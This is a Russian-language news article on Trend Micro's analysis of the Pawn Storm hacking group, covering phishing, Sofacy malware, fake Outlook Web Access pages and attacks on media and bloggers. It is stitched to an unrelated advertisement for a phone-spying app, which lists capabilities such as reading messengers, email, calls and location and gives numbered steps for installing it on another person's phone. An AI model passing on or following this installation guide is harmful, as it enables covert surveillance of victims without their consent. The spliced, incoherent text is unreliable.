Операция Pawn Storm может быть направлена против NATO

21bf77bbdfff08c0d4818667c3bf615a Исследовательский центр Trend Micro выполнил анализ деятельности Pawn Storm, участники данной операции уже атаковали многие правительственные ресурсы и сервера. Впервые данная группа начала действовать в середине 2007 года, эксперты по безопасности напрямую связывают её с правительством России. Некоторые аналитики считают, что работа этой хакерской группы стала своеобразным ответом на санкции и всеобщую экономическую блокаду РФ со стороны членов еврозоны.

Мишенями для атаки стали объекты военной и оборонной промышленности разных стран планеты, а также государственные средства массовой информации. Совсем недавно подобной атаке подверглись несколько французских информационных агентств. Аналитики Trend Micro отмечают, что механизм действия преступной группы достаточно отлажен. Используется несколько типичных стратегий, которые зачастую базируются на халатном отношении к безопасности со стороны должностных лиц некоторых структур. Распространённой проблемой остаётся фишинг.

Первый вариант – рассылка писем с фишинговыми ссылками. Получателю было достаточно простого открытия ссылки для того, чтобы в целевой компьютер внедрялось вредоносное ПО Sofacy. Долгое время программу не могли заблокировать известные антивирусные системы. Второй вариант эксплоит, который внедрялся через сайты польского правительства. Вредоносный элемент позволял удалённо запускать произвольный код, в зависимости от поступавших команд. Третья стратегия – поддельная страница, использующаяся для авторизации Microsoft Outlook Web Access. Пользователь видел на экране привычный интерфейс и часто забывал обратить внимание на адресную строку. В итоге воровались и логины, и пароли, и служебная информация конфиденциального характера.

В конце января текущего дома мишенью стал и Белый Дом. Три популярных Youtube-блоггера подверглись фишинговым атакам после того, как взяли интервью у первого лица США. Также интерфейс их каналов на Youtube скопировали и использовали для заражения новых компьютеров. Как считают сотрудники Trend Micro, подобное воздействие представляет собой классический способ давления. Если к главному объекту атаки (в данном случае – Барак Обама) подобраться нельзя, начинаются атаки на лица, так или иначе связанные с ним. Под раздачу попали блоггеры, которые могли и не выражать определённого мнения по политическим вопросам. Самого факта размещения интервью с президентом на их канале было достаточно для активизации работы хакеров.

Ряд ведущих американских изданий СМИ подвергся аналогичным атакам, а корпоративная почта многих сотрудников оказалась взломанной. Основная волна противозаконных действий приходилась на конец 2014 года. Как считают аналитики, инфраструктура и вычислительные мощности участников Pawn Storm продолжают расти, а следующим объектом для атаки могут стать члены NATO. Официальных обвинений в сторону России никто не выдвигал, поскольку вся полученная информация является лишь предположением независимых аналитиков.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.